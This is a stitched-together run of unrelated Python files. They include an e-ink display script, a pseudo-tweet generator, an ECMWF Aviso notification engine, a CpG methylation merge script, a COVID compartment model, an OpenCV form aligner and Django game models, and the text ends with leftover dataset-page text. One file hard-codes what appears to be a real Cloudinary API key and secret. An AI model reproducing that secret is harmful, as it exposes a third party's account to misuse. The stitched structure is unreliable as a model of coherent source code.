        # the original may have intended to exit here.
    papirus=Papirus(rotation=180)
    papirus.clear()
    # Setting the screen color
    BLACK=0
    WHITE=1
    # Set the background to white
    image=Image.new('1',papirus.size,WHITE)
    draw=ImageDraw.Draw(image)
    # Grabbing the width and height of the screen
    width,height=image.size
    # Setting the size/font for the IP Address
    ipSize=int((width-4)/(8*0.65))
    ipFont=ImageFont.truetype(ipFont,ipSize)
    # Grabbing the IP Address by opening a UDP socket towards a public DNS
    # server (no traffic is sent); assumes the device already has a route.
    s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("8.8.8.8",80))
    ipAddr= s.getsockname()[0]
    s.close()
    # Drawing a white canvas around the screen
    draw.rectangle((0,0,papirus.size[0],papirus.size[1]),fill=WHITE,outline=WHITE)
    # Scroll the IP address across the display for ~30 seconds, shifting it
    # left by 25 px per half-second partial update.
    inc=5
    t_end = time.time() + 30
    while time.time() < t_end:
        for i in range(0,len(ipAddr)):
            image=Image.new('1',papirus.size,WHITE)
            draw=ImageDraw.Draw(image)
            draw.text((inc,30),ipAddr,fill=BLACK,font=ipFont)
            papirus.display(image)
            papirus.partial_update()
            inc-=25
            time.sleep(0.5)
        # Reset the scroll offset for the next pass.
        inc=5
    papirus.update()
    # Show a goodbye message, then blank the display.
    draw.text(((5-inc),30),"Bye bye",fill=BLACK,font=ipFont)
    papirus.display(image)
    papirus.update()
    time.sleep(5)
    papirus.clear()
|
import numpy as np
from numpy.random import randint
# Alphabet used to encode decimal digits into pseudo-word characters.
LIST_OF_CHARS = ['a','b','c','d','e','f','g','h','@','#','1','2','3','4','5','6','7', '8', '9', '0']
# Number of sample-tweet lines to generate.
NUMBER_OF_LINES = 100000
#NUMBER_OF_LINES = 20
# Exclusive upper bound for the random integers that seed each word.
MAX_NUMBER = 1000000
# NOTE(review): this module-level draw is shadowed by the local variable in
# generate_one_line and is otherwise unused; kept for compatibility.
random_ints = randint(0,MAX_NUMBER, randint(0,70))

def convert_number_to_word(n):
    """Map a non-negative integer to a pseudo-word, one char per digit.

    Each decimal digit d (least-significant first) selects
    LIST_OF_CHARS[(d * 23) % 20]. Returns '' for n <= 0.
    """
    list_chars = []
    while n > 0:
        k = ((n % 10) * 23) % 20
        list_chars.append(LIST_OF_CHARS[k])
        # BUG FIX: the original `n = n / 10` was integer division on
        # Python 2 but float division on Python 3, breaking the digit walk
        # (TypeError on a float list index). Floor division keeps the exact
        # Python 2 semantics and works on both versions.
        n = n // 10
    return ''.join(list_chars)
def generate_one_line():
    """Build one space-separated line of random pseudo-words."""
    # Draw a random count (0..69) of random seeds, encode each as a word.
    draws = randint(0, MAX_NUMBER, randint(0, 70))
    words = [convert_number_to_word(value) for value in draws]
    return ' '.join(words)
# Script entry point: write NUMBER_OF_LINES of generated sample tweets.
if __name__ == '__main__':
    with open(r'../tweet_input/sample_tweets_1.txt', 'w') as _file:
        # FIX: the original used the Python 2 `print` statement and xrange,
        # which are syntax/name errors on Python 3; range/print() behave
        # identically here.
        for i in range(NUMBER_OF_LINES):
            print('{} / {}'.format(i, NUMBER_OF_LINES))
            _file.write(generate_one_line())
            _file.write('\n')
    # FIX: dropped the redundant explicit _file.close() -- the `with`
    # statement already closes the file on exit.
import code.rule_simplification.CheckReplacementForFitting as CheckReplacementForFitting
def check(first_model, second_model, dict_tokens_info, config):
    """
    Find if the first model is equivalent to the second
    Author: Kulunchakov Andrei
    """
    # Equivalence requires fitting in both directions: first -> second,
    # and only on success, second -> first (with any set of parameters).
    fits_forward = CheckReplacementForFitting.check(
        first_model, second_model, dict_tokens_info, config, do_plot=False, verbose=True)
    if not fits_forward:
        return False
    fits_backward = CheckReplacementForFitting.check(
        second_model, first_model, dict_tokens_info, config, verbose=True)
    return True if fits_backward else False
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
import getpass
import json
import os
import threading
from abc import ABC, abstractmethod
from datetime import datetime
from queue import Queue
from typing import List, Dict
from . import EngineType
from .. import logger, __version__, exit_channel
from ..authentication.auth import Auth
from ..user_config import EngineConfig
DATE_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"
class Engine(ABC):
    """
    This class implements the interface to the notification server. It is abstract to separate the interface from the
    specific notification server
    """

    def __init__(self, config: EngineConfig, auth: Auth):
        """Store connection settings and create the synchronisation locks."""
        super(Engine, self).__init__()
        self._host = config.host
        self._port = config.port
        self._polling_interval = config.polling_interval
        self._engine_type = config.type
        self.timeout = config.timeout
        self.catchup = config.catchup
        self._auth = auth
        self._https = config.https
        self._listeners = []
        # this is used to synchronise multiple listening threads accessing the state
        self._state_lock = threading.Lock()
        # this is used to synchronise multiple listening threads accessing the listeners list
        self._listeners_lock = threading.Lock()

    @property
    def engine_type(self) -> EngineType:
        return self._engine_type

    @property
    def host(self) -> str:
        return self._host

    @property
    def port(self) -> int:
        return self._port

    @property
    def auth(self) -> Auth:
        return self._auth

    @property
    def https(self) -> bool:
        return self._https

    @abstractmethod
    def pull(self, key: str,
             key_only: bool = False,
             rev: int = None,
             prefix: bool = True,
             min_rev: int = None,
             max_rev: int = None) -> List[Dict[str, any]]:
        """
        Abstract method to query the notification server for all the key-values associated to the key as input.
        This key can be a prefix, it can therefore return a set of key-values
        :param key: input in the query
        :param key_only: if True no values are returned
        :param rev: revision to pull
        :param prefix: if true the function will retrieve all the KV pairs starting with the key passed
        :param min_rev: if provided it filters for only KV pairs with mod_revision >= to min_rev
        :param max_rev: if provided it filters for only KV pairs with mod_revision <= to max_rev
        :return: List of key-value pairs formatted as dictionary
        """
        pass

    @abstractmethod
    def push(self,
             kvs: List[Dict[str, any]],
             ks_delete: List[str] = None,
             ttl: int = None) -> bool:
        """
        Abstract method to submit a list of key-value pairs and delete a list of keys from the server as a
        single transaction
        :param kvs: List of KV pair
        :param ks_delete: List of keys to delete before the push of the new ones. Note that each key is read as a folder
        :param ttl: time to leave of the keys pushed, once expired the keys will be deleted
        :return: True if successful
        """
        pass

    @abstractmethod
    def delete(self, key) -> List[Dict[str, bytes]]:
        """
        This method deletes all the keys associated to this prefix
        :param key: key prefix to delete
        :return: kvs deleted
        """
        pass

    @abstractmethod
    def _polling(self,
                 key: str,
                 callback: callable([str, str]),
                 channel: Queue,
                 from_date: datetime = None,
                 to_date: datetime = None):
        """
        This method implements the active polling
        :param key: key to watch as a prefix
        :param callback: function to call if any change happen
        :param channel: global communication channel among threads
        :param from_date: date from when to request notifications, if None it will be from now
        :param to_date: date until when to request notifications, if None it will be until now
        :return:
        """
        pass

    def listen(self,
               keys: List[str],
               callback: callable([str, str]),
               from_date: datetime = None,
               to_date: datetime = None) -> bool:
        """
        This method allows to listen for changes to specific keys. Note that the key is always considered as a prefix.
        The listening is implemented with a background thread doing a active polling. Multiple listening threads can
        be created by calling this method multiple times.
        :param keys: keys to watch
        :param callback: function to trigger in case of changes
        :param from_date: date from when to request notifications, if None it will be from now
        :param to_date: date until when to request notifications, if None it will be until now
        :return: True if the listener is in execution, False otherwise
        """
        logger.debug("Calling listen...")
        for key in keys:
            try:
                # create a background thread for the polling
                t = threading.Thread(target=self._polling, args=(key, callback, exit_channel, from_date, to_date))
                # FIX: Thread.setDaemon() is deprecated since Python 3.10 and
                # removed in 3.13; assign the attribute directly instead.
                t.daemon = True
                # adding the thread to the global list
                logger.debug(f"Starting thread to listen to {key}")
                self._add_listener(key)
                t.start()
                logger.debug(f"Thread {t.ident} started to listen to {key}")
            except Exception as e:
                logger.error(f"Listening to {key} could not be started: {e}")
                logger.debug("", exc_info=True)
                self._remove_listener(key)
                return False
        return True

    def stop(self, key: str = None) -> bool:
        """
        This method is used to stop a listening thread. if no key is provided all the listening thread will be stopped
        :param key: the key associated to the listening thread
        :return: True if the listener is cancelled, False otherwise
        """
        logger.debug("Calling stop...")
        if len(self._listeners) > 0:
            if key is None:  # if not key is defined we simply stop all the listeners
                # by removing its entry from this list the thread will automatically stop
                logger.debug(f"Stopping all the polling")
                self._remove_all_listeners()
                return True
            elif key in self._listeners:
                # stop the polling
                logger.debug(f"Stopping the polling for key {key}")
                # by removing its entry from this list the thread will automatically stop
                self._remove_listener(key)
                return True
            else:
                logger.debug(f"Cannot find polling of key {key}")
                return False
        return True

    def push_with_status(self,
                         kvs: List[Dict[str, any]],
                         base_key: str,
                         message: str = "",
                         admin_key: str = None,
                         ks_delete: List[str] = None,
                         ttl: int = None) -> bool:
        """
        Method to submit a list of key-value pairs and delete a list of keys from the server as a
        single transaction. This method also updates the status of the base key.
        :param kvs: List of KV pair
        :param base_key: base key where to push the status
        :param message: message to be part of the status update
        :param admin_key: admin key to push together with the status
        :param ks_delete: List of keys to delete before the push of the new ones. Note that each key is read as a folder
        :param ttl: time to leave of the keys pushed, once expired the keys will be deleted
        :return: True if successful
        """
        # create the status payload
        # noinspection PyUnresolvedReferences
        status = {
            "etcd_user": self.auth.username,
            "message": message,
            "unix_user": getpass.getuser(),
            "aviso_version": __version__,
            "engine": self._engine_type.name,
            "hostname": os.uname().nodename,
            # NOTE(review): datetime.utcnow() is deprecated in Python 3.12;
            # kept as-is to preserve the naive-UTC timestamp format.
            "date_time": datetime.utcnow().strftime(DATE_FORMAT)
        }
        # update the status with the revision of the current status. This helps creating a linked list
        old_status_kvs = self.pull(base_key, prefix=False)
        if len(old_status_kvs) == 1:
            self._status_as_linked_list(status, old_status_kvs)
        status_kv = {
            "key": base_key,
            "value": json.dumps(status)  # push it as a json
        }
        kvs.append(status_kv)
        if admin_key:
            # prepare the admin key value pair
            admin_kv = {
                "key": admin_key,
                "value": "None"
            }
            kvs.append(admin_kv)
        return self.push(kvs, ks_delete, ttl)

    def _status_as_linked_list(self, new_status, old_status_kvs):
        """Link the new status to the previous one via server revisions."""
        if "mod_rev" in old_status_kvs[0]:  # test engine does not have it
            new_status["prev_rev"] = old_status_kvs[0]["mod_rev"]
        # update the status with date and rev of the last_prev_day. This helps creating a linked list across days
        old_status = json.loads(old_status_kvs[0]["value"].decode())
        old_date_time = datetime.strptime(old_status["date_time"], DATE_FORMAT)
        new_date_time = datetime.strptime(new_status["date_time"], DATE_FORMAT)
        # compare status dates
        if old_date_time.date() == new_date_time.date():
            # we are still on the same day
            if "last_prev_day_rev" in old_status:
                new_status["last_prev_day_rev"] = old_status["last_prev_day_rev"]
        else:
            # new day -> use the previous status as last_prev_day
            # NOTE(review): assumes "prev_rev" was set above; on the test
            # engine (no "mod_rev") this path would raise KeyError -- confirm.
            new_status["last_prev_day_rev"] = new_status["prev_rev"]

    def _add_listener(self, key: str):
        """Register a listener key (thread-safe)."""
        with self._listeners_lock:
            self._listeners.append(key)

    def _remove_all_listeners(self):
        """Drop all listener keys, stopping every polling thread (thread-safe)."""
        with self._listeners_lock:
            self._listeners.clear()

    def _remove_listener(self, key: str):
        """Drop one listener key, stopping its polling thread (thread-safe)."""
        with self._listeners_lock:
            self._listeners.remove(key)
|
# This script merges Bismark CpG report files from multiple samples by genomic
# position, applies a minimum-coverage filter, aggregates the retained CpG
# sites over reference BED intervals, and derives per-region methylation
# tendencies. (Header translated from Korean.)
# Outputs: <name>_total_merge.txt (pre-filter), <name>_filtered_merge.txt
# (post-filter), <name>_sum.txt and <name>_mean.txt (per-region aggregates
# over the reference BED), and <name>_Tendency.txt.
import sys
import time
import numpy as np
import argparse
# NOTE(review): argparse is set up only for usage/help output -- the code
# below reads sys.argv directly instead of the parsed `args` object.
parser = argparse.ArgumentParser(description='Code Usage')
parser.add_argument('name',metavar='NAME', help='input name you want')
parser.add_argument('cov_num', metavar='F', help='input filtering number')
parser.add_argument('Ref bed file', metavar='R',help='input Refernce bed file')
parser.add_argument('CpG report files', metavar='Files', nargs='+', help='input Bismark CpG report files')
args = parser.parse_args()
start_time = time.time()
# Chromosome names chr1..chr22 plus the sex chromosomes.
Chromosome = []
for num in range(1,23):
    Chromosome.append('chr'+str(num))
Chromosome.extend(['chrX','chrY'])
data_files = sys.argv[4:] #Bismark CpG report file
Length = len(data_files)
# Pass 1: per chromosome, collect per-sample methylation info and append the
# unfiltered merge file.
for chromosome in Chromosome:
    data_dict = {}
    Pos_dict = {}
    for dfile in data_files:
        dopen = open(dfile)
        dlines = dopen.readlines()
        dopen.close()
        data_dict[dfile] = {}
        for dline in dlines:
            line = dline.strip().split('\t')
            Chr = line[0]
            Position = line[1]
            # Description = methylated;unmethylated;percent;context
            if line[3] == '0':
                Description = line[3], line[4], str(0), line[6]
            else:
                Description = line[3], line[4], str(round(int(line[3]) / (int(line[3]) + int(line[4]))*100,2)), line[6]
            Description = ';'.join(Description)
            if Chr == chromosome:
                data_dict[dfile][Position] = Description
    # NOTE(review): sys.argv[4] is the FIRST CpG report file, not the
    # reference BED (sys.argv[3]) that the comment suggests -- confirm intent.
    with open(sys.argv[4], 'r') as handle0: #input bed file
        for line0 in handle0:
            line0 = line0.strip().split('\t')
            Chr0 = line0[0]
            Position0 = line0[1]
            if Chr0 == chromosome:
                Pos_dict[Position0] = Chr0
    # NOTE(review): `dfile` here is the variable leaked from the loop above,
    # i.e. the positions of the LAST report file are used as the key set.
    key_Position = data_dict[dfile].keys()
    key_Chromosome = Pos_dict.keys()
    with open(sys.argv[1]+'_total_merge.txt', 'a') as handle1: # name
        for key in key_Position:
            handle1.write(Pos_dict[key] + '\t' + key)
            for dfile in data_files:
                handle1.write('\t' + data_dict[dfile][key])
            handle1.write('\n')
    data_dict.clear()
    Pos_dict.clear()
# Pass 2: keep only the positions where EVERY sample reaches the requested
# minimum coverage (sys.argv[2]).
with open(sys.argv[1] + '_filtered_merge.txt' , 'w') as final_merge:
    with open(sys.argv[1]+'_total_merge.txt', 'r') as merge_file:
        for line in merge_file:
            line_list = line.strip().split('\t')
            temp_list = []
            for i in range(0,Length):
                inp = line_list[2+i].split(';')
                # Dynamically named var0..varN hold each sample's fields.
                globals()['var{}'.format(i)] = inp
                if int(globals()['var{}'.format(i)][0]) + int(globals()['var{}'.format(i)][1]) < int(sys.argv[2]):
                    continue
                else:
                    temp_list.append(int(globals()['var{}'.format(i)][0]))
            if len(temp_list) == Length :
                final_merge.write('\t'.join(line_list) + '\n')
# Pass 3: aggregate the filtered CpG sites over the reference BED intervals.
for Chr in Chromosome:
    cpg_dic = {}
    with open(sys.argv[1]+'_filtered_merge.txt' ,'r') as CPG: #filtered file
        for line in CPG:
            cpg_list = line.strip().split('\t')
            if cpg_list[0] == Chr:
                cpg_dic[cpg_list[1]] = ','.join(cpg_list[2:])
                # Keep only the methylated/unmethylated counts (fields 0 and
                # 1 of every 4-field per-sample entry).
                cpg_character = ",".join(cpg_list[2:])
                cpg_character = cpg_character.split(';')
                cpg_character = ','.join(cpg_character)
                cpg_character = cpg_character.split(',')
                cpg_character = cpg_character[0::4] + cpg_character[1::4]
                cpg_character = ','.join(cpg_character)
                cpg_dic[cpg_list[1]] = cpg_character
    bed_dic = {}
    result = {}
    with open(sys.argv[3], 'r' ) as bed: #reference CpG bed file
        for bed_line in bed:
            bed_list = bed_line.strip().split('\t')
            if bed_list[0] == Chr:
                Start = int(bed_list[1])
                End = int(bed_list[2])
                for cpg_site in list(cpg_dic.keys()):
                    if Start <= int(cpg_site) <= End:
                        if Chr + ' ' + str(Start) +' '+ str(End) not in result:
                            result[Chr + ' ' + str(Start) + ' ' + str(End)] = cpg_dic[cpg_site]
                        else:
                            result[Chr + ' ' + str(Start) + ' ' + str(End)] += ';'+cpg_dic[cpg_site]
                    else:
                        continue
    with open(sys.argv[1] + '_sum.txt', 'a') as handle: #Sum value
        for key in result.keys():
            Coverage = result[key].split(',')
            Coverage = ','.join(Coverage)
            Coverage = Coverage.replace(',' ,';')
            Coverage = Coverage.split(';')
            # NOTE(review): dividing by 6 assumes exactly three samples
            # (2 numbers per sample); confirm for other sample counts.
            CpG_num = str(int(len(Coverage)/6))
            Coverage = list(map(int, Coverage))
            TEMP = []
            for i in range(0,Length):
                TEMP.append(sum(Coverage[i::Length*2]))
                TEMP.append(sum(Coverage[i+Length::Length*2]))
            TEMP = list(map(str, TEMP))
            TEMP = ','.join(TEMP)
            TEMP = TEMP.replace(',',' ')
            handle.write(key + '\t' + CpG_num + '\t' + TEMP + '\n')
    with open(sys.argv[1] + '_mean.txt', 'a') as handle: #Mean value
        for key in result.keys():
            Coverage = result[key].split(',')
            Coverage = ','.join(Coverage)
            Coverage = Coverage.replace(',' ,';')
            Coverage = Coverage.split(';')
            CpG_num = str(int(len(Coverage)/6))
            Coverage = list(map(int, Coverage))
            TEMP = []
            for i in range(0,Length):
                TEMP.append(np.around(np.mean(Coverage[i::Length*2])))
                TEMP.append(np.around(np.mean(Coverage[i+Length::Length*2])))
            TEMP = list(map(str, TEMP))
            TEMP = ','.join(TEMP)
            TEMP = TEMP.replace(',',' ')
            handle.write(key + '\t' + CpG_num + '\t ' + TEMP + '\n')
# Pass 4: derive +/-/. tendencies from the summed values (differences T-E
# and T-L between the sample columns of the _sum file).
with open(sys.argv[1] + '_Tendency.txt', 'w') as tendency:
    with open(sys.argv[1] + '_sum.txt', 'r') as handle:
        for line in handle:
            line1 = line.strip()
            if '\t' in line:
                line = line.strip()
                line = line.replace('\t', ' ')
                line = line.split(' ')
                Chr = line[0]
                Start = line[1]
                End = line[2]
                CpG_NUM = line[3]
                E = line[4]
                T = line[6]
                L = line[8]
                # Tendency of T relative to E, encoded as "value;sign".
                T_E = int(line[6]) - int(line[4])
                if T_E > 0 :
                    T_E = str(T_E) + ';' + '+'
                elif T_E < 0:
                    T_E = str(T_E) + ';' + '-'
                elif T_E == 0 :
                    T_E = str(T_E) + ';' + '.'
                # Tendency of T relative to L, same encoding.
                T_L = int(line[6]) - int(line[8])
                if T_L > 0 :
                    T_L = str(T_L) + ';' + '+'
                elif T_L < 0:
                    T_L = str(T_L) + ';' + '-'
                elif T_L == 0 :
                    T_L = str(T_L) + ';' + '.'
                tendency.write(Chr + '\t' + Start + '\t' + End + '\t' + CpG_NUM + '\t' + E + '\t' +line[5] + '\t' + T + '\t' + line[7] + '\t' + L + '\t' + line[9] + '\t' + str(T_E) + '\t' + str(T_L) + '\n')
print("Working Time {} sec." .format(round(time.time() - start_time,2)))
|
class BigDict(object):
    """A dict whose values accumulate: putting an existing key appends the
    new value to the stored one, comma-separated."""

    def __init__(self):
        self.collection = dict()

    def put(self, key, value):
        """Store value under key, appending ',value' if key already exists."""
        # Idiom fix: use the `in` operator instead of calling the
        # __contains__ dunder directly, and avoid the double lookup.
        if key in self.collection:
            self.collection[key] = self.collection[key] + ',' + value
        else:
            self.collection[key] = value

    def keys(self):
        """Return a view of all stored keys."""
        return self.collection.keys()

    def get(self, key):
        """Return the accumulated value for key (raises KeyError if absent)."""
        return self.collection[key]

    def pop(self, key):
        """Remove and return the accumulated value for key."""
        return self.collection.pop(key)
import cloudinary
# Configure the global cloudinary client for the "roadpadi" account.
# SECURITY NOTE(review): the API key and secret are hard-coded in source;
# move them to environment variables / a secrets store and rotate the
# exposed secret.
cloudinary.config(
    cloud_name="roadpadi",
    api_key="842581262512282",
    api_secret="U3yenMVfOLC33BcA1dWhzjs_VBE"
)
from rest_framework import urlpatterns
from .view.read_view import StoryViewset,CommentViewset
from .view.write_view import CreateStory,StoryDetail,CreateComment,CommentDetail
from rest_framework_nested import routers
from django.urls import path, include
# DRF routers: /stories/ plus nested /stories/<story_pk>/comments/.
router = routers.DefaultRouter()
router.register('stories',StoryViewset)
story_router = routers.NestedDefaultRouter(router, 'stories', lookup='story')
story_router.register('comments',CommentViewset,basename="story-comments")
# URL map: router-generated read endpoints plus explicit write endpoints
# for creating/updating stories and comments.
urlpatterns = [
    path(r'',include(router.urls)),
    path(r'',include(story_router.urls)),
    path('addstory/',CreateStory.as_view(),name="add_story"),
    path('addstory/<uuid:id>/',StoryDetail.as_view(),name="update_story"),
    path('addcomment/<uuid:parent>/',CreateComment.as_view(),name="add_comment"),
    path('updatecomment/<uuid:id>/',CommentDetail.as_view(),name="update_comment"),
]
|
# coding: utf-8
__author__ = 'deff'
from scanner.base import BaseScanner
## Dynamic-information scanner (comment translated from Chinese).
class DynamicScanner(BaseScanner):
    """Scanner stub for dynamic (runtime) analysis; every stage is a no-op."""
    def __init__(self):
        super().__init__()
    ## Can be started directly on its own.
    def start(self):
        return ""
    # Initialisation step.
    def init(self):
        pass
    # Perform the scan.
    def scan(self):
        pass
    # Produce the report.
    def report(self):
        pass
    # Cleanup when finished.
    def delete(self):
        pass
    def __del__(self):
        pass
|
import numpy as np
'''
characters of COVID-19
'''
# Epidemiological parameters (units: days / dimensionless rates).
t_eps = 5.2 #incubation period(day)
t_I = 14 #lasting of I(day)
t_Ia = 14 #lasting of Ia(day)
d = 0.15 #death rate
R_0 = 2.68 #basic reproduction number
Pa = 0.018 #proportion of Ia
# Relative infectiousness of latent (r_L) and asymptomatic (r_a) carriers.
r_L = 1.0
r_a = 0.6
'''
get parameters and covert them to values measured under step(30min)
'''
# A day is divided into 48 half-hour simulation steps, hence the "/ 48".
#Lemma B.1
eps = (1 / t_eps) / 48
mu_a = (1 / t_Ia) / 48
#Lemma B.2
# NOTE(review): the denominator (t_I - d) mixes a duration in days with a
# dimensionless rate; confirm against the referenced Lemma B.2.
alpha = (d / t_I) / 48
mu = ((1 - d) / (t_I - d)) / 48
#beta
# Per-step transmission rate derived from R_0, compounded per 30-min step.
beta = R_0 / (r_L * t_eps + (Pa * r_a + (1- Pa)) * t_I)
beta = np.power(1 + beta , 1 / 48) - 1
'''
get state transition possibilities
'''
# Per-step transition probabilities between compartments:
# L->I (symptomatic), L->Ia (asymptomatic), I->D, I->R, Ia->R.
L_I = eps * (1 - Pa)
L_Ia = eps * Pa
I_D = alpha
I_R = mu
Ia_R = mu_a
'''
'''
class node :
    """One spatial node of a stochastic SEIR-like (S, L, I, Ia, R, D) model.

    Compartment counts are non-negative integers; step() advances the node
    by one 30-minute simulation step using multinomial draws.
    """
    def __init__ (self,id ):
        self.id = id
        # Compartment counts, all initially empty.
        self.susceptible = 0
        self.latent = 0
        self.infected = 0
        self.death = 0
        self.infected_asymptomatic = 0
        self.recovered = 0
    def set_susceptible(self,susceptible):
        self.susceptible = susceptible
    def set_latent(self,latent):
        self.latent = latent
    def set_infected(self,infected):
        self.infected = infected
    def set_infected_asymptomatic(self,infected_asymptomatic):
        self.infected_asymptomatic = infected_asymptomatic
    def set_death(self,death):
        self.death = death
    def set_recovered(self,recovered):
        self.recovered = recovered
    def step(self):
        """Advance one 30-min step: S->L, L->I/Ia, I->D/R, Ia->R draws."""
        if(self.susceptible+self.latent+self.infected+self.infected_asymptomatic+self.recovered>0):
            #S->L
            # Force of infection: carriers weighted by relative
            # infectiousness (I at 1, Ia at r_a, L at r_L), over the living.
            lambda_j = ((self.infected + self.infected_asymptomatic * r_a + self.latent * r_L) / (self.susceptible+self.latent+self.infected+self.infected_asymptomatic+self.recovered)) * beta
            # np.random.multinomial treats the final pval as 1 - sum(rest).
            susceptible_to_latent,__ = np.random.multinomial(self.susceptible,[lambda_j, 1])
            self.susceptible -= susceptible_to_latent
            self.latent += susceptible_to_latent
            #L->I,L->Ia
            latent_to_infected,latent_to_Ia,__ = np.random.multinomial(self.latent,[L_I, L_Ia, 1])
            self.infected += latent_to_infected
            self.infected_asymptomatic += latent_to_Ia
            self.latent -= (latent_to_Ia + latent_to_infected)
            #I->D,I->R
            infected_to_death,infected_to_recovered,__ = np.random.multinomial(self.infected,[I_D,I_R,1])
            self.death += infected_to_death
            self.recovered += infected_to_recovered
            self.infected -= (infected_to_death + infected_to_recovered)
            #Ia->R
            Ia_to_recovered , __ = np.random.multinomial(self.infected_asymptomatic,[Ia_R,1])
            self.recovered += Ia_to_recovered
            self.infected_asymptomatic -= Ia_to_recovered
import cv2
import os
import numpy as np
class FormTransform:
    """Align a scanned/photographed form image to a reference template.

    Uses ORB features with brute-force Hamming matching to estimate a
    homography, then warps the input image onto the template's frame.
    """

    def __init__(self, max_features, good_match, is_debug=False):
        """
        :param max_features: number of ORB features to detect
        :param good_match: fraction (0..1] of the best matches to keep
        :param is_debug: when True, write intermediate images to a Debug dir
        """
        self.max_features = max_features
        self.good_match = good_match
        self.is_debug = is_debug
        # Idiom fix: `if is_debug == True` -> plain truthiness test.
        if is_debug:
            self.debug_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'Debug', 'FormTransform')
            if not os.path.exists(self.debug_path):
                os.makedirs(self.debug_path)

    def align_image(self, im1, im2):
        """Warp im1 so that it aligns with the reference image im2."""
        im1Gray = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)
        im2Gray = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)
        orb = cv2.ORB_create(self.max_features)
        keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)
        keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)
        matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)
        # BUG FIX: on OpenCV >= 4.5.4 DescriptorMatcher.match returns a
        # tuple, which has no .sort(); sorted() handles both list and tuple.
        matches = sorted(matcher.match(descriptors1, descriptors2, None), key=lambda x: x.distance)
        # Keep only the best fraction of matches by descriptor distance.
        numGoodMatches = int(len(matches) * self.good_match)
        matches = matches[:numGoodMatches]
        points1 = np.zeros((len(matches), 2), dtype=np.float32)
        points2 = np.zeros((len(matches), 2), dtype=np.float32)
        for i, match in enumerate(matches):
            points1[i, :] = keypoints1[match.queryIdx].pt
            points2[i, :] = keypoints2[match.trainIdx].pt
        # Robust homography estimate (outliers rejected via RANSAC).
        matrix, mask = cv2.findHomography(points1, points2, cv2.RANSAC)
        height, width, _ = im2.shape
        corrected = cv2.warpPerspective(im1, matrix, (width, height), cv2.INTER_LINEAR, borderValue=(255, 255, 255))
        if self.is_debug:
            cv2.imwrite(os.path.join(self.debug_path, 'fixed.png'), corrected)
        return corrected
from django.db import models
# Create your models here.
class Acs(models.Model):
    """Alliance Combat Strike (ACS) fleet grouping aimed at one target."""
    name = models.CharField(max_length=50, null=True, default=None)
    target = models.PositiveIntegerField()
    arrival = models.IntegerField(null=True, default=None)
class Alliance(models.Model):
    """Player alliance: identity, description, membership policy and limits."""
    ally_name = models.CharField(max_length=50, default='')
    ally_tag = models.CharField(max_length=20, default='')
    # User id of the alliance founder/owner.
    ally_owner = models.PositiveIntegerField(default=0)
    # Unix timestamp of creation.
    ally_register_time = models.IntegerField(default=0)
    ally_description = models.TextField()
    ally_web = models.CharField(max_length=255, default='')
    ally_text = models.TextField()
    ally_image = models.CharField(max_length=255, default='')
    # Application/join policy fields.
    ally_request = models.CharField(max_length=1000, null=True, default=None)
    ally_request_notallow = models.BooleanField(default=False)
    ally_request_min_points = models.PositiveIntegerField(default=0)
    ally_owner_range = models.CharField(max_length=32)
    ally_members = models.PositiveSmallIntegerField()
    ally_stats = models.BooleanField(default=True)
    ally_diplo = models.BooleanField(default=True)
    ally_universe = models.PositiveSmallIntegerField()
    ally_max_members = models.PositiveIntegerField(default=20)
    ally_events = models.CharField(max_length=55, default='')
class AllianceRanks(models.Model):
    """Permission flags for a named rank within an alliance (0/1 values)."""
    rank_name = models.CharField(max_length=32)
    alliance_id = models.PositiveIntegerField()
    member_list = models.PositiveSmallIntegerField(default=0)
    online_state = models.PositiveSmallIntegerField(default=0)
    transfer = models.PositiveSmallIntegerField(default=0)
    see_apply = models.PositiveSmallIntegerField(default=0)
    manage_apply = models.PositiveSmallIntegerField(default=0)
    round_mail = models.PositiveSmallIntegerField(default=0)
    admin = models.PositiveSmallIntegerField(default=0)
    kick = models.PositiveSmallIntegerField(default=0)
    diplomatic = models.PositiveSmallIntegerField(default=0)
    ranks = models.PositiveSmallIntegerField(default=0)
    manage_users = models.PositiveSmallIntegerField(default=0)
    events = models.PositiveSmallIntegerField(default=0)
class AllianceRequest(models.Model):
    """A user's pending application to join an alliance."""
    text = models.TextField()
    user_id = models.PositiveIntegerField()
    alliance_id = models.PositiveIntegerField()
    # Unix timestamp of when the request was filed.
    time = models.IntegerField()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.